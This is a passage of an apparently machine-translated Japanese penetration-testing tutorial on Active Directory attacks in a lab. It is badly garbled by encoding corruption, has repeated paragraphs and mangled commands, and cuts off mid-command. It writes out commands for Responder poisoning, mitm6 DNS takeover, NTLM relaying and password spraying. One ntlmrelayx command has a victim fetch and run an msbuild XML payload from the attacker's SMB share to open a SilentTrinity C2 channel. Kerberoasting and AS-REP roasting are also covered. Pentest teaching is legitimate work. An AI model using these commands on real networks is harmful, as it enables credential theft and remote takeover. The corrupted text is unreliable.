0x01ã¯ããã«
浞éãã¹ãã®åã«ããã€ãã®ã¯ã©ã€ã¢ã³ããç§ã«ãã£ãŠæ¥ãŠã圌ãã®è匱æ§ã¹ãã£ã³ãæ·±å»ãªè匱æ§ã瀺ãããã»ãã¥ãªãã£ãã¹ãã®æºåãã§ããŠããªãããã圌ãã®ã·ã¹ãã ã¯éåžžã«è¯ãã»ãã¥ãªãã£ã®ä»äºãããŠãããšèšã£ãŠããŸãã
äŸµå ¥ãã¹ãã®åéã§ç§ãèŠãæè²ã®æ¬ é¥ã®1ã€ã¯ãçŸåšäŸµå ¥ã¢ã¯ãã£ããã£ã¬ã¯ããªïŒADïŒã«é¢äžããŠããç¥èã®æ¬ åŠã§ããæ®å¿µãªãããOSCPã¯åºåãã¹ããã«ããŒããŠããããSans-Gpenã³ãŒã¹ã§ãããã£ãã«ããã䌎ãããšã¯ãããŸããããã®èšäºã®ç®æšã¯ãéå»ã®ADã®ã»ãã¥ãªãã£ãã¹ãã§äœ¿çšãããã¯ããã¯ãããŒã«ãããã³æ¹æ³ã®ããã€ãã玹ä»ããããšã§ããããã¯ãåæ¹æ³ãŸãã¯ããŒã«ã«é¢ããå æ¬çãªããã¥ã¢ã«ã§ã¯ãããŸããããã®ã·ãªãŒãºã§ã¯ãKali Linux 2019ã䜿çšããä»®æ³ãã·ã³ãä»ããŠèªåã®ä»®æ³ãã¡ã€ã³ã§åäœããŸãã
ãŸããç®æšã説æããããšããå§ããŸããããæµžéãã¹ãã®ç®æšã¯ãæ»æè ããããã¯ãŒã¯ãç Žå£ããããã«äœ¿çšããå¯èœæ§ã®ããæ»æãã¯ãã«ãç¹å®ããããšã§ãããã¡ã€ã³ç®¡çè ã®æš©éçšã§ã¯ãããŸããã
ç®æšãåŸãããã®ã§ããããéæããããã«ããã€ãã®æé ã«åŸããŸãã以äžã¯ããã¹ãã»ãã·ã§ã³ã®ïŒã©ãïŒã€ã©ã¹ãã¬ã€ãã§ãã
æŠèŠïŒã¯ã©ã€ã¢ã³ããããªããéã£ãŠãActive Directoryã䜿çšãããããã¯ãŒã¯äžã§æµžéãã¹ããå®è¡ããŸããé¢é£æ å ±ã¯æäŸãããŠãããããã°ã€ã³è³æ Œæ å ±ãæ»æç¯å²ããã¯ã©ã€ã¢ã³ãäŒæ¥ã®æ£é¢çé¢ã«å ¥ãè³æ ŒããããŸããããè£å£ããå ¥ã£ãŠIPé»è©±ä»ãã®é ããéšå±ãèŠã€ããããšãã§ããŸãã IPé»è©±ã®ãã©ã°ãæããã©ãããããã«æ¥ç¶ããŠãã«ã¹ã¿ããŒãµãŒãã¹äŒç€ŸãšåãLANã«ããããšãããããŸããæ¬¡ã¯äœã§ããïŒè¶³å Žãç²åŸããèš±å¯ãååŸããŸãã
0x02ãã§ãŒãº1ïŒèš±å¯ã®è¶³å Žã®ååŸ
ä¿¡èšèšŒææžãªãã§ãç§ãã¡ãã§ããåµå¯ã®æ°ã¯å¶éãããŠããããµã€ã¯ã«å šäœã®ã»ãŒãã¹ãŠã®ã¹ããããè¡ããŸããããããã¯ãŒã¯ã«åºã¥ããŠããã«å¯Ÿçãè¬ããããšãã§ããŸãããŸãããããã¯ãŒã¯ã¢ã¯ã»ã¹ããããããifconfigãŸãã¯ipconfigçµç±ã§ãµããããã確èªããŠãã ããã IPãååŸããåŸãNMAPã§pingã¹ãã£ã³ãå®è¡ããŠãä»ã®ããã€ã¹ãã¢ã¯ã»ã¹å¯èœãã©ããã確èªããŸãã
NMAP -SN 192.168.1.1/24
ãã£ã¹ãã¬ã€Pingãæ»ã£ãŠããå Žåããããã¯ãŒã¯ããã€ã¹ããããã¯ãŒã¯ã«æ¥ç¶ã§ããŸããäœãåŸãããªãå ŽåãICMPãç¡å¹ã«ãªã£ãŠããå¯èœæ§ããããŸãããããã¯ãŒã¯äžã«ä»ã®ããã€ã¹ã¯ãããŸããããŸãã¯ãèªèšŒãããŠããªããããä»ã®ããã€ã¹ãšéä¿¡ã§ãããCisco ISEãªã©ã®ã¢ã€ãã³ãã£ãã£ã»ãã¥ãªãã£ãœãªã¥ãŒã·ã§ã³ã«ãã£ãŠãããã¯ãããå¯èœæ§ããããŸãããã®èšäºã®ç®çã®ããã«ãäžéšã®ããã€ã¹ãããã¯ãŒã¯ã«æ¥ç¶ãããŠãããããããæ£åžžã«pingããããšãã§ãããšæ³å®ãããŠããŸãã
1.ã¬ã¹ãã³ããŒ
次ã«ãResponderãšåŒã°ããããŒã«ã䜿çšããããWindowsã奜ãå Žåã¯Inveighã䜿çšããŸãããããã®2ã€ã®ããŒã«ã®åœ¹å²ã¯ãADã«ãããéåžžã«äžè¬çãªèª€ã£ãäžæçãã®èœåããã§ãã¯ããWPADããã³NBT-NSäžæ¯ãããããããšã§ããããã©ã«ãã§ã¯ãWindowsã¯ãã€ã³ã¿ãŒãããã䜿çšãããšãã«ãã¡ã€ã«ãèªåçã«çºèŠããããã«Webãããã·ãæ€çŽ¢ããããã«æ§æãããŠããŸããããã¯ãããã€ã¹ããããŒããã£ã¹ããªã¯ãšã¹ããããã·ãã¡ã€ã«ãéä¿¡ãããããã·ãã¡ã€ã«ãåä¿¡ãããããçµç¹ã§åœ¹ç«ã¡ãŸãããã ããåœç¶ããããã·ãã¡ã€ã«ãéä¿¡ãã人ã確èªããªããããæ»æè ã¯ã¹ããŒãã£ã³ã°ãããåçãéä¿¡ããŠããè³æ Œæ å ±ãèŠæ±ã§ããŸãã
次ã«ãResponderãšåŒã°ããããŒã«ã䜿çšããããWindowsãšInveighã奜ãå Žåã¯äœ¿çšããŸãããããã®2ã€ã®ããŒã«ã®åœ¹å²ã¯ãADã®äžè¬çãªèª€ã£ãæ¡æããã§ãã¯ããWPADããã³NBT-NSäžæ¯ãããããããšã§ããå Žåã«ãã£ãŠã¯ãWindowsãWebãããã·ãæ€çŽ¢ããããã«æ§æãããŠãããã€ã³ã¿ãŒãããã䜿çšãããšãã«ãã¡ã€ã«ãèªåçã«æ€åºããŸããããã¯ãããã€ã¹ããããŒããã£ã¹ããªã¯ãšã¹ããããã·ãã¡ã€ã«ãéä¿¡ãããããã·ãã¡ã€ã«ãåä¿¡ããããããšã³ã¿ãŒãã©ã€ãºçµç¹ã§åœ¹ç«ã¡ãŸãããã ããåœç¶ããããã·ãã¡ã€ã«ãéä¿¡ãã人ã«èªèšŒãããŠããããæ»æè ãã¹ããŒãã£ã³ã°ãããåçãéä¿¡ããŠããè³æ Œæ å ±ãèŠæ±ããããšãã§ããŸãã
ã«ãªã§ã¯ãã¬ã¹ãã³ããŒã®ããã©ã«ãã€ã³ã¹ããŒã«
Responder -I ETH0 -WPAD
Windows 7ã³ã³ãã¥ãŒã¿ãŒã§ã¯ãã€ã³ã¿ãŒããããšã¯ã¹ãããŒã©ãŒãéããŠGoogleã«è¡ããWPADãã¡ã€ã«ã®æ€çŽ¢ãéå§ããŸããã¬ã¹ãã³ããŒã§ã¯ããªã¯ãšã¹ããã¹ã衚瀺ãããã¬ã¹ãã³ããŒããã£ã¬ã³ãžã§ãªã¯ãšã¹ãã«èªåçã«å¿çããŸããããã«ããã被害è ã¯ãŠãŒã¶ãŒåãšããã·ã¥ãã¹ã¯ãŒããéä¿¡ããŸãïŒntlmv2圢åŒïŒ
ãã®ããã·ã¥ããŒãã«ã§ãç§ãã¡ã¯äœããããããšãã§ããŸãããªã¬ãŒã«ntlmrelay.pyã®ãããªããŒã«ã䜿çšããããšããããšãã§ããŸãããã®æçš¿ã§ãNTLMããã·ã¥ã転éããæ¹æ³ã説æããã®ã§ããããã¯ã©ãã¯ããæ¹æ³ã説æããŸããããã¯éåžžãèšç»ãããšãã«ç§ãããããšã ããã§ãã
æ£çŽã«èšããšãLinux/Kaliã§ãã¹ã¯ãŒããã¯ã©ãã¯ããããšã¯ãã£ãã«ãããŸããã Kaliã«é©åã«ã€ã³ã¹ããŒã«ãããããšããªãNVIDIA GPUã°ã©ãã£ãã¯ã¹ã«ãŒãã䜿çšããŠããŸããWindowsã«ã¯HashcatguiããããŸããããã«ãããç°¡åã«äœ¿çšã§ããŸããåéãããããã·ã¥å€ããhash.txtããšãããã¡ã€ã«ã«ä¿åããããã€ãã®ç°¡åãªã«ãŒã«ãšå ¥åèšå®ãšåºåèšå®ãå®è¡ããŸããããã®èšäºã§ã¯èŸæžRockyou.txtã䜿çšããŠå®è¡ãã1ç§ã§ããã·ã¥å€ãæ£åžžã«å²ããŸããã
Hashcatguiã®ç§ã®èšå®
ãã¹ã¯ãŒããæ£åžžã«ã¯ã©ãã¯ããã®ã§ãAlice:Passwordã®ãã°ã€ã³è³æ Œæ å ±ããããŸãïŒ
ç¶ç¶ããåã«ãã¬ã¹ãã³ããŒããã°ã©ã ãæ©èœããªãå Žåã«åããŠãä»ã®æ¹æ³ãããã€ãèŠããããšæããŸãã
2.mitm6
ã¯ã©ã€ã¢ã³ãã®ãããã¯ãŒã¯ãæ£åœãªWPAD PACãã¡ã€ã«ã䜿çšããŠãããã¹ããŒãã£ã³ã°ãé©åã«æ©èœããŠããªããšä»®å®ããŸãã IPv6ãšDNSã䜿çšããŠãè³æ Œæ å ±ãã¿ãŒã²ããã«äžç¶ããå¥ã®ææ³ããããŸããããã©ã«ãã§ã¯ãIPv6ãæå¹ã«ãªããå®éã«IPv4ãããåªå ãããŸããã€ãŸããã³ã³ãã¥ãŒã¿ãŒã«IPv6 DNSãµãŒããŒãããå ŽåãIPv4ã䜿çšããŸããããã«ãããã©ã«ãã§ã¯ãWindowsã³ã³ãã¥ãŒã¿ãŒã¯DHCPV6èŠæ±ãä»ããŠIPv6 DNSãµãŒããŒãæ€çŽ¢ããŸããåœã®IPv6 DNSãµãŒããŒã䜿çšããŠã¹ããŒãã£ã³ã°ãããšãããã€ã¹ãDNSãã¯ãšãªããæ¹æ³ã广çã«å¶åŸ¡ã§ããŸããããã§ããå€ãã®ã³ã³ãã³ããèªãããšãã§ããŸãã
ãŸããMITM6ãããŠã³ããŒãããŸã
git clone https://github.com/fox-it/mitm6.git
CD MITM6
ãããã€ã³ã¹ããŒã«ã
次ã«ãã¿ãŒã²ãããããã¯ãŒã¯ã¯ãŒã¯ã°ã«ãŒãã«å¯ŸããŠå®è¡ããŸãã以åã«pingã¹ãã£ã³ãè¡ã£ãããšããããããã¿ãŒã²ãããã¡ã€ã³ãlab.localã§ããããšã瀺ãnetbiosåãååŸããŸããã
MITM6ãå®è¡ããåã®ã¿ãŒã²ããã®IPèšå®ã¯æ¬¡ã®ãšããã§ãã
DNSãµãŒããŒã«æ³šæããŠãã ãã
次ã«ãMITM6ãå®è¡ããŸã
mitm6 -d lab.local
ããã§ãã¿ãŒã²ããäžã®DNSãµãŒããŒã倿ŽãããŸãã
IPv6ã¢ãã¬ã¹ã¯DNSãµãŒããŒãšããŠäœ¿çšãããããšã«æ³šæããŠãã ãã
çŸåšã®çã®è匱æ§ã¯ãWindowsã§ã®IPv6æ»æãIPv4ãããåªããŠããããšã§ããã€ãŸããDNSã¯çŸåšå¶åŸ¡ãããŠããŸãã
ãããã£ãŠãDNSãå¶åŸ¡ããããã«NTLMRELAYX.PYã«ãã£ãŠåã³WPADå¿çãåã³å¹ãé£ã°ããšããäºå®ãå©çšããŠãã ãããããã§ã¯ãã»ããã¢ããæ¹æ³ã«é¢ããã¬ã€ããæžããŸããã
MITM6ã1ã€ã®ãŠã£ã³ããŠã§å®è¡ãããšãã¯ãå¥ã®ãŠã£ã³ããŠãéããntlmrelayx.pyãå®è¡ããŸã
ntlmrelayx.py -wh 192.168.218.129 -t smbïŒ//192.168.218.128/-i
-WH:ãµãŒããŒãã¹ãã£ã³ã°WPADãã¡ã€ã«ïŒæ»æè ã®IPïŒ
-T:ã¿ãŒã²ããïŒã¹ããŒãã£ã³ã°ããŠããåãããã€ã¹ã«è³æ Œæ å ±ãäžç¶ããããšã¯ã§ããŸããïŒ
-IïŒã€ã³ã¿ã©ã¯ãã£ããªã·ã§ã«ãéããŸã
ãããããå®å šã«ã€ã³ã¿ã©ã¯ãã£ããªSMBã·ã§ã«ãæã£ãŠãããã®ããã«ãNetcatãä»ããŠã·ã§ã«ã«æ¥ç¶ãããã-CïŒã³ãã³ãïŒãä»ããŠåžåœã®ã¹ããŒã¬ãŒãéä¿¡ããããšãã§ããŸããå®éãããªãã®éžæã¯NTLMRELAYX.PYãã§ããããšã«éå®ãããŠããŸãããã®å Žåã-Cã³ãã³ãã䜿çšããŠãSilent Trinityæå¹ãªãã€ããŒããå®è¡ããŸãã Silent Trinityã®äœ¿ç𿹿³ã«ã€ããŠããã«æžããŸããã
ntlmrelayx.py -WH 192.168.218.129 -T SMB: //192.168.218.50/-NO -SMB -SERVER -C 'c: \ windows \ microsoft.net \ framework64 \ v3.5 \ msbuild.exe \\ 192.168.218.129 \ smb \ msbuild.xml'
ãã ãããã®å ŽåãMSBUILD.EXEã¯ãã®å Žåã«XMLãã¡ã€ã«ãæ§ç¯ããŠããããSilent Trinityãžã®æ¥ç¶ãè¿ãããŸãããããã¯ç°¡åãããããã§ãã代ããã«ãSMBãµãŒããŒãèŠãŠããªã¬ãŒããã·ã¥ã衚瀺ããŸã
ããããç§ã¯ãããããŸãã¯ã©ãã¯ããŸãã
ããã§ãã¬ã¹ãã³ããŒã䜿çšããã«ãããã¯ãŒã¯è³æ Œæ å ±ãæ£åžžã«æã£ãŠããŸã
3.CrackMapexec
CrackMapexecã¯ãæ¬è³ªçã«ã¹ã€ã¹ã¢ãŒããŒãã€ãã§ãããã¹ã¯ãŒãã¹ãã¬ãŒãšããã·ã¥ããã³ãã³ãã®å®è¡ãŸã§ããã¹ãŠã®æµžéãã¹ããããã§äœ¿çšããå¿ èŠããããŸã
ä»ã®ãã¹ãŠã倱æããå Žåã¯ããã¹ã¯ãŒãã¹ãã¬ãŒã詊ãããšãã§ããŸãããã®æ¹æ³ãæåŸã®æ¹æ³ã§ããçç±ã¯ããã¹ã¯ãŒããããã¯ãããŠããããã§ãããã¹ã¯ãŒãã®ããã¯ã¯ãããªããæãã»ã©äžè¬çã§ã¯ãªããããæ»æè ã¯èŸæžã䜿çšããŠãŠãŒã¶ãŒåãæ»æã§ããŸãããŠãŒã¶ãŒåãååŸããããšã¯æåã®ã¹ãããã§ããããã¯ãOSINTããã³æ å ±ã³ã¬ã¯ã¿ãŒã䜿çšããŠå®è¡ã§ããŸãã OSINTã®ãŠãŒã¶ãŒåããªãå Žåã¯ãCrackMapexecïŒCMEïŒã«ãŠãŒã¶ãŒåã®èŸæžãäžããããšãã§ããŸãããæéã®çç±ã§ãrsmithã®ãŠãŒã¶ãŒåãååšãããšä»®å®ããŸãã
Kaliã®æ°ããããŒãžã§ã³ã䜿çšããŠããå ŽåãCrackMapexecã¯ããã©ã«ãã§ã€ã³ã¹ããŒã«ãããŸãããããã§ãªãå Žåã¯ã€ã³ã¹ããŒã«ã§ããŸã
apt-get crackmapexecãã€ã³ã¹ããŒã«ããŸã
ã¹ãã£ã³å ã®ãããã¯ãŒã¯äžã®ããã€ã¹ãèå¥ããããããŠãŒã¶ãŒåãšãã¢ã«ãªã£ããã¹ã¯ãŒãèŸæžãCMEã«æäŸãããã°ã€ã³ããããšããããšãã§ããŸãã
CrackMapexec SMB 192.168.218.40 -D Lab.Local -U rsmith -Pã/documents/wordlists/fastTrack.txt -Shares
æ°ç§ã§ãã¹ã¯ãŒããååŸãããŸãã
ããã¯CTF-Yã®ããã«èŠãããããããŸããããã·ãŒãºã³:æ³ã¯éåžžã«äººæ°ã®ããæå·ã®çµã¿åããã§ãã
ãããã®èŠã€ãã£ãè³æ Œæ å ±ã䜿çšãããšãéåžžã®ãŠãŒã¶ãŒã¢ã«ãŠã³ããããã以äžã®èš±å¯ãå¢ããç¶ããŠããŸã
äžèšã§ã¯ã3ã€ã®ç°ãªãæ¹æ³ã§ãã¡ã€ã³ã®è³æ Œæ å ±ãååŸããŸããããã®èšäºã®ã»ãšãã©ã«ã€ããŠã¯ãèš±å¯ãäœã¬ãã«ã§ãããããRsmithãŠãŒã¶ãŒè³æ Œæ å ±ã䜿çšããŸããããã«ãããèš±å¯ãšã¹ã«ã¬ãŒã·ã§ã³ãå¯èœã«ãªããŸãã
ãã¡ãããWindowsã§ã®èš±å¯ãšã¹ã«ã¬ãŒã·ã§ã³ã¯ãèŠç©ããã®ãªããããããµãŒãã¹ãã¹ã·ã¹ãã ã®æ¬ èœããçããå¯èœæ§ããããŸãããããã¯åºåã®ãã¹ãã§ãããããããã€ãã®åºåã³ã³ãã³ããå©çšããŠã¢ã¯ã»ã¹èš±å¯ããšã¹ã«ã¬ãŒã·ã§ã³ããŸãã
ãããã¯ãŒã¯è³æ Œæ å ±ã䜿çšãããšãæåã«æ å ±åéãè¡ããæ¬¡ã«ãããã®è匱æ§ãçŽæ¥è¡šç€ºããå¿ èŠããããŸããç§ãã¡ã«åœ¹ç«ã€ããã€ãã®ããŒã«ãšãã¯ããã¯ããããŸãã
0x03ã¹ããŒãž2ïŒç¹æš©ã®æšé«ãšæ å ±åé
1.Bloodhound
ç§ã®ãæ°ã«å ¥ãã®ããŒã«ã®1ã€ã¯Bloodhoundã§ããã°ã©ãã£ã«ã«ã«è¡šç€ºãããŠããBloodhoundã¯ãã°ã©ãå ã®ãã¡ã€ã³ãæåéããããã³ã°ããé¢é£ããé¢ä¿ãšç¡é¢ä¿ã®é¢ä¿ãæããã«ããŠãããããçŽ æŽãããããŒã«ã§ããæ»æè ã®èŠç¹ãããããã¯ç§ãã¡ã«ã¿ãŒã²ããã瀺ããŠããã®ã§è峿·±ãã§ãã
ããã§èªãããšãã§ããBloodHoundã«é¢ããèšäºå šäœãæžããŸããããTLã瀺ããŸããDRããŒãžã§ã³
ã³ã³ãã¥ãŒã¿ãŒã§ã»ãã·ã§ã³ãååŸããŠããªãããè³æ Œæ å ±ããããšããŸãã Bloodhoundã®Pythonã䜿çšããŠããªã¢ãŒãã§ããŒã¿ãåéã§ããŸãã Gitãä»ããŠã€ã³ã¹ããŒã«ã§ããŸã
git clone https://github.com/fox-it/bloodhound.py.git
CD Bloodhound.py/pipã€ã³ã¹ããŒã«
ãã®åŸãè³æ Œæ å ±ããã¡ã€ã³ãããã³DC IPSãééããããšã§å®è¡ã§ããŸã
Bloodhound -Python -D Lab.Local -U RSMITH -P WINTER2017 -GC LAB2008DC01.LAB.LOCAL -C ALL
BHãã¿ã¹ã¯ãå®äºãããšãããŒã¿ã.json圢åŒã§å®è¡ããŠãããã£ã¬ã¯ããªã«ä¿åããŸãããããã®ãã¡ã€ã«ãã³ããŒããŠãã©ããããŠã³ãã«ãã©ãã°ãããšãçŽ æµãªWebããããã§ããŸããã ããã¡ã€ã³ç®¡çã®ããã®æçãã¹ãã§äžŠã¹æ¿ãããšã以äžã®ãã®ã«äŒŒããã®ãåŸãããŸãã
Gumminaliceã¯DCã«ãã°ã€ã³ããŸã
ããã®å©ç¹ã¯ã管çè ããã°ã€ã³ããŠããã³ã³ãã¥ãŒã¿ãŒãçŽæ¥è¡šç€ºããŠã次ã®ç®æšãæäŸã§ããããšã§ããäœäž»æš©ã®è³æ Œæ å ±ãåãå ¥ããæ°çŸãŸãã¯æ°åã®ã³ã³ãã¥ãŒã¿ãŒããããã¡ã€ã³ã§ã¯ãä»ã®äœããªãã¬ãžã®è³æ Œæ å ±ãåéããã ãã§æéãç¡é§ã«ããããããŸãããããã«ãããã¿ãŒã²ããã®ãªã¹ããšä»ã®å€ãã®ãã®ãæäŸãããŸãããã®ä»ã®çšéã«ã¯ãè³æ Œæ å ±ãå«ãããŒã¿ããŒã¹ãããSQLãµãŒããŒã®èå¥ãRDPã«æ¥ç¶ã§ãããã·ã³ã®èå¥ãªã©ããããŸããããã§è©³çŽ°ãªæ©èœãæãäžããããšããå§ãããŸãããŸããBloodhoundãæããæ»æèšç»ãèªåçã«æŽ»çšããGoFetcãã芧ãã ããã
2. KERBEROSTING | getuserspns.py
ã¿ãŒã²ãããªã¹ããšãã¡ã€ã³ã³ã³ãããŒã©ãŒãèå¥ããããšã«ãããã¢ã¯ã»ã¹èš±å¯ãã¢ããã°ã¬ãŒããã1ã€ã®æ¹æ³ã¯KerberoAstingã§ãããµãŒãã¹ããªã³ã·ãã«åïŒSPNïŒãADã®ãµãŒãã¹ã¢ã«ãŠã³ãã«çºè¡ããããããKerberostingãå®è¡ã§ããŸãããã®åŸããã¹ãŠã®ãŠãŒã¶ãŒã¯ããã®ã¢ã«ãŠã³ãã®ããã·ã¥ãã¹ã¯ãŒãã䜿çšããŠSPNããKerberosãã±ãããèŠæ±ã§ããŸãïŒKerberos 5 TGS-REP圢åŒïŒã Kerberostingã«ã¯ããŸããŸãªããŒã«ããããŸãããå®éã«ã¯1ã€ã®ããŒã«ã ããå¿ èŠã§ãã
getUserSpns.pyã¯éåžžã«ã·ã³ãã«ã§ã - ã¿ãŒã²ãããã¡ã€ã³ã®ãŠãŒã¶ãŒã¢ã«ãŠã³ãã®äžã§å®è¡ãããŠããSPNãç §äŒããŸãããšãŠã䜿ããããã§ãã
ããã§ããµãŒãã¹ã¢ã«ãŠã³ãã«ããã·ã¥å€ããããŸãã以äžã«ç€ºãããã«ãããã·ã¥ã«ããïŒãã¡ããGUIïŒã«ããŒãããéžæããããã·ã¥ã¿ã€ã13100ãéžæããŸãã
æ°ç§ã§æ£åžžã«ççºããŸã
çŸåšããµãŒãã¹ã¢ã«ãŠã³ãã®è³æ Œæ å ±ããããŸããããã¯éåžžããã¡ã€ã³ã³ã³ãããŒã©ãŒãžã®ã¢ã¯ã»ã¹ãæåããŸããç°¡åãããŸããïŒä»ã®æ¹æ³ã詊ããŠã¿ãŸãããã
3. aseproasting |ã«ããŠã¹
aseproastingã¯Kerberostingã«äŒŒãŠããŸãããã®æå³ã§ãã¢ã«ãŠã³ãã®TGTãç §äŒããããã·ã¥ãååŸããŠããã¯ã©ãã¯ããŸãããAseproastingã®å Žåã«ã¯éåžžã«å€§ããªèŠåããããŸãã Kerberos as-reqã¡ãã»ãŒãžãä»ããŠTGTãèŠæ±ãããšããŠãŒã¶ãŒåãšãã¹ã¯ãŒãã§æå·åãããã¿ã€ã ã¹ã¿ã³ããæäŸããŸããæ¬¡ã«ãããŒãã£ã¹ããªãã¥ãŒã»ã³ã¿ãŒïŒKDCïŒã¯ã¿ã€ã ã¹ã¿ã³ãã埩å·åãããã®ãŠãŒã¶ãŒããã®ãªã¯ãšã¹ããæ€èšŒããèªèšŒããã»ã¹ãé²ã¿ãŸããããã¯ãKerberosã®èªèšŒåã®ããã»ã¹ã§ãããããã¯æããã«æ»æè ã®åé¡ã§ãããªããªããç§ãã¡ã¯KDCã§ã¯ãªããã¡ãã»ãŒãžãè§£èªã§ããªãããã§ãããã¡ãããããã¯æ»æãé²ãããã«èšèšãããŠããŸãããäºåèªèšŒããªãã«ãªã£ãå Žåã¯ãä»»æã®ãŠãŒã¶ãŒã«AS-REQãéä¿¡ã§ããããã·ã¥ãã¹ã¯ãŒããè¿ããŸããããã¯ãŸãã§ãããäºåèªèšŒãããã©ã«ãã§æå¹ã«ãªã£ãŠããããããŸã èšåãã䟡å€ããããŸãã
ãKerberosã®äºåèªèšŒã¯å¿ èŠãªãããããTsmithã¯asReproastingã®åœ±é¿ãåããããã
ãããæŽ»çšããããã«ãRubeusãšåŒã°ããããŒã«ã䜿çšããŸããã«ããŠã¹ã¯ãKerberosãä¹±çšãã倧ããªããŒã«ã»ããã§ãããã¢ã¹ã¬ããã¹ãã®å Žåãç§ãã¡ã¯ãã®éšåã«é¢å¿ããããŸãã Rubeusã䜿çšããã«ã¯ããŸãVisual Studioãã€ã³ã¹ããŒã«ããå¿ èŠããããŸããã€ã³ã¹ããŒã«ãå®äºããããRubeusãããŠã³ããŒãããVisual Studioã䜿çšããŠRubeus.slnãã¡ã€ã«ãéããŸãã
ããã©ã«ãã§ã¯ãrubes \ bin \ debug \ fileã«ã€ã³ã¹ããŒã«ãããŸãã CDã¯ãã®ãã£ã¬ã¯ããªã«å ¥ãããããå®è¡ããŸãïŒ
ã\ rubeus.exe asreproast
ãŠãŒã¶ãŒããKerberosã®äºåèªèšŒãå¿ èŠã§ãªããããã§ãã¯ããªãå ŽåããŠãŒã¶ãŒã¯èªèšŒãããŸãããããããããå Žå.
ãã®åŸããŠãŒã¶ãŒã®ããã·ã¥ãååŸããŠã¯ã©ãã¯ã§ããŸãã
ãã®äŸã¯ãã¡ã€ã³çµåãã·ã³ã§è¡ãããŠããããããã¡ã€ã³ã«ãªããã·ã³ãããããè¡ã£ãŠããå Žåã¯ããã¡ã€ã³ã³ã³ãããŒã©ãŒããã¡ã€ã³åãOUãªã©ã«æ¥ç¶ããå¿ èŠããããŸãã
4.silenttrinity
SilentTrinityã¯ãIronpythonãšCïŒã䜿çšãã @byt3bl33d3rã«ãã£ãŠéçºãããæ°ããã³ãã³ãããã³ã³ã³ãããŒã«ïŒC2ïŒããŒã«ã§ãã MSBUILD.EXEã䜿çšãããªãã·ã§ã³ããããŸããCïŒã³ãŒãïŒããã©ã«ãã§ã¯ããã©ã«ãã§.NETã®äžéšãšããŠWindows 10ã«ã€ã³ã¹ããŒã«ãããŠããïŒãæ§ç¯ããWindowsãã€ããªãã³ãã³ããšã³ã³ãããŒã«ïŒC2ïŒã®ãã€ããŒããXML圢åŒã§å®è¡ããæ»æè ãåºç€ãšãªã.NETãã¬ãŒã ã¯ãŒã¯ã䜿çšããŠãIronpythonãCïŒããã³ãã®ä»ã®èšèªãä»ããŠç ç²è ã®ãã¹ããæäœã§ããããã«ããŸãã
å人çã«ãSilent -Trinityã¯ç§ã®ããŒã«ããã¯ã¹ã§åžåœã«åã£ãŠä»£ãããç§ã¯ããã«åžåœã®äœ¿ç𿹿³ã«é¢ããã¬ã€ããæžããŸãããç§ã¯åžåœã®ã€ãªããã奜ãå Žæãããã€ããããŸãããSTã¯ãã¢ã«ãã¡ãç¶æ ã«ããããããã®æ©èœãSTã«åæ ãããŸããç§ã®æèŠã§ã¯ãSTãåžåœã«åã£ãŠä»£ããäž»ãªçç±ã3ã€ãããŸãã
Empireã®ãã€ããŒãã¯ãé£èªåã«ãããŠãããWindowsã®ãã£ãã§ã³ããŒã«ãã£ãŠãã£ããã£ãããŠããŸãïŒããã解決ããæ¹æ³ã¯ãããããããŸãããããã§ãïŒã
STã¯ã³ãã³ãã®äžã§å®è¡ãããŸã
âAT execãã©ã¡ãŒã¿ãŒã䜿çšããŠCMEã§ãã€ããŒããå®è¡ããå Žåãã·ã¹ãã èš±å¯ã«ã¢ã¯ã»ã¹èš±å¯ãã¢ããã°ã¬ãŒãã§ããŸã
ããã¯ãéãã¡ã€ã³ç®¡çè ãŠãŒã¶ãŒè³æ Œæ å ±ã䜿çšããæ°ããWindows10ã€ã³ã¹ããŒã«ã®POCã§ã
ã¢ã«ãŠã³ããTsmithãã¯ããŠãŒã¶ãŒã°ã«ãŒãã®ã¿ã«ãããŸã
Tsmithã®è³æ Œæ å ±ã䜿çšããŠã³ãŒããå®è¡ããŸã
SilentTrinityã§XMLãã€ããŒããçæããSmbServer.pyçµç±ã§SMBãµãŒããŒã§ãã¹ãããŸãããããè¡ãæ¹æ³ã«ã€ããŠæ··ä¹±ããŠããå Žåã¯ãç§ã®ã¬ã€ãã«åŸã£ãŠãã ãããæ¬¡ã«ãCMEã䜿çšããŠãæ»æè ã®ãã·ã³ã§XMLãã¡ã€ã«ãååŸããã³ãã³ããå®è¡ããŸãã
Silenttrinityã§XMLãã€ããŒããçæããSMB Server.pyãä»ããŠSMBãµãŒããŒã§ãã¹ãããŸãããããè¡ãæ¹æ³ã«ã€ããŠæ··ä¹±ããŠããå Žåã¯ãç§ã®æç€ºã«åŸã£ãŠãã ãããæ¬¡ã«ãCMEã䜿çšããŠãæ»æè ã®ãã·ã³ã§XMLãã¡ã€ã«ãååŸããã³ãã³ããå®è¡ããŸãã
CrackMapexec 192.168